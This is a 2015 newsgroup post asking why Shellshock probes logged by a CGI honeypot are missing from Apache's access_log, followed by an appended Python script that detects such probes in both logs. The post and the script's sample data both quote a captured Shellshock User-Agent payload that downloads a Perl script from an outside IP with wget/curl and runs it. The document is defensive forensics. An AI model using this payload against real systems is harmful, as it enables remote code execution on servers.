Markus R. Keßler
2015-02-16 20:15:59 UTC
Hi everybody,
we are under contract with a hoster running Apache 1.3.42 on top of
Debian.
When Shellshock attacks got popular in October, our so-called "admin"
tried to bugfix his shell. Unfortunately, when trying to patch this
ancient bash 2.05b, he messed something up, and from then on, for
instance, CTRL-L (clear screen) doesn't work any more.
But maybe, there's more damage than known.
Now I see that some attack attempts based on the Shellshock bug
are recorded by a "honeypot" which I once installed.
These are Perl scripts within the cgi-bin directory of a virtual server,
which have widely known names like "mail.cgi", but in reality they
collect all environment variables and write them into a logfile,
together with the data the attacker has sent.
In the "honey pot" logfile I see requests like
HTTP_USER_AGENT = () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("rm -rf /tmp/l.pl*;wget http://87.106.189.34/ou.pl -O /tmp/l.pl;curl -O /tmp/l.pl http://87.106.189.34/ou.pl;perl /tmp/l.pl;rm -rf l.pl**");'
but in the Apache logs (access_log*) there's no such entry; not even a
grep for the attacker's IP gives me any result.
In my understanding, when such a request is passed to a certain CGI
script, this should also be visible in Apache's logs?
Can anyone please give me a hint where to look for this misbehaviour?
Maybe there's just a known configuration issue, so that those requests
are not logged under certain circumstances?
Thanks in advance.
Best regards,
Markus
--
Please reply to group only.
For private email please use http://www.dipl-ing-kessler.de/email.htm
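Added example (editor's addition, not part of Markus's post and not his honeypot code): the check he describes by hand, done systematically. It flags Shellshock-style payloads (a value beginning with the bash exported-function marker "() {") in two sources, an Apache access_log in the standard "combined" format and the honeypot's environment dump, extracts the URLs the payload fetches, and then lists honeypot clients for which access_log has no line at all. Assumptions: access_log uses the combined LogFormat with Apache's backslash-escaping of quotes and backslashes inside quoted fields; the honeypot writes one "NAME = value" line per environment variable and separates requests with a blank line (the post does not state its exact file layout). The payload is the one quoted in the post; the client addresses and log lines are constructed sample data.

```python
"""Flag Shellshock probes in an Apache combined access_log and in a honeypot
CGI's environment dump, then cross-check which honeypot clients never made
it into access_log.  Added example, not the original poster's code."""
import re
from dataclasses import dataclass, field as dc_field
from typing import Dict, Iterable, Iterator, List, Optional, Set

# Apache "combined" LogFormat:  %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
# Quoted fields may contain backslash-escaped quotes and backslashes.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<bytes>\S+)'
    r' "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$')
# One "NAME = value" line of the honeypot's environment dump (assumed layout).
ENV_LINE_RE = re.compile(r'^(?P<name>[A-Za-z0-9_]+) = (?P<value>.*)$')
# Shellshock trigger: a value starting with an exported bash function
# definition; an unpatched bash runs whatever follows the closing brace.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s\'";<>]+')

_SIMPLE_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', '"': '"', '\\': '\\'}


def unescape_logitem(s: str) -> str:
    """Undo Apache's escaping of quoted log fields (\\" \\\\ \\n \\xHH ...)."""
    def repl(m: re.Match) -> str:
        e = m.group(1)
        if e.startswith('x'):
            return chr(int(e[1:], 16))
        return _SIMPLE_ESCAPES.get(e, e)
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', repl, s)


@dataclass
class Finding:
    source: str            # "access_log" or "honeypot"
    host: Optional[str]    # client address, if the record carries one
    where: str             # header / environment variable carrying the payload
    payload: str
    urls: List[str] = dc_field(default_factory=list)   # fetched URLs (IOCs)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for k in ('request', 'referer', 'agent'):
        rec[k] = unescape_logitem(rec[k])
    return rec


def shellshock_findings(source: str, host: Optional[str],
                        fields: Dict[str, str]) -> List[Finding]:
    out = []
    for name, value in fields.items():
        if SHELLSHOCK_RE.match(value):
            urls = list(dict.fromkeys(URL_RE.findall(value)))  # dedupe, keep order
            out.append(Finding(source, host, name, value, urls))
    return out


def scan_access_log(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue   # not combined format; a real tool would count these
        hdrs = {k: rec[k] for k in ('request', 'referer', 'agent')}
        findings.extend(shellshock_findings('access_log', rec['host'], hdrs))
    return findings


def honeypot_records(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Group env-dump lines into per-request records (blank-line separated)."""
    rec: Dict[str, str] = {}
    for line in lines:
        m = ENV_LINE_RE.match(line)
        if m:
            rec[m.group('name')] = m.group('value')
        elif not line.strip() and rec:
            yield rec
            rec = {}
    if rec:
        yield rec


def scan_honeypot_log(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    for rec in honeypot_records(lines):
        findings.extend(shellshock_findings('honeypot', rec.get('REMOTE_ADDR'), rec))
    return findings


def hosts_missing_from_access_log(honeypot_findings: List[Finding],
                                  access_lines: Iterable[str]) -> Set[str]:
    """Honeypot clients with a Shellshock payload but no access_log line at all."""
    logged = {r['host'] for r in map(parse_combined, access_lines) if r}
    return {f.host for f in honeypot_findings if f.host and f.host not in logged}


# --- constructed sample data (payload as quoted in the post, RFC 5737 client IPs) ---
PAYLOAD = r"""() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("rm -rf /tmp/l.pl*;wget http://87.106.189.34/ou.pl -O /tmp/l.pl;curl -O /tmp/l.pl http://87.106.189.34/ou.pl;perl /tmp/l.pl;rm -rf l.pl**");'"""


def _logesc(s: str) -> str:   # what Apache does to a quoted field
    return s.replace('\\', '\\\\').replace('"', '\\"')


ACCESS_LOG = [
    '192.0.2.10 - - [16/Feb/2015:20:01:12 +0000] "GET /cgi-bin/mail.cgi HTTP/1.1" '
    '200 512 "-" "' + _logesc(PAYLOAD) + '"',
    '198.51.100.7 - - [16/Feb/2015:20:02:30 +0000] "GET /index.html HTTP/1.1" '
    '200 2326 "-" "Mozilla/5.0"',
]
HONEYPOT_LOG = [
    'REMOTE_ADDR = 192.0.2.10', 'REQUEST_URI = /cgi-bin/mail.cgi',
    'HTTP_USER_AGENT = ' + PAYLOAD, '',
    'REMOTE_ADDR = 203.0.113.5', 'REQUEST_URI = /cgi-bin/mail.cgi',
    'HTTP_USER_AGENT = ' + PAYLOAD,
]

if __name__ == '__main__':
    hp = scan_honeypot_log(HONEYPOT_LOG)
    for f in scan_access_log(ACCESS_LOG) + hp:
        print(f.source, f.host, f.where, f.urls)
    print('honeypot hits absent from access_log:', hosts_missing_from_access_log(hp, ACCESS_LOG))
```

Run against real files by replacing the two constructed lists with the lines of access_log and the honeypot log. The cross-check only says which clients are missing; it does not tell you why, so the next step is to confirm the honeypot's vhost actually points at the CustomLog you are grepping and to repeat the grep across every rotated access_log* file from the request's date.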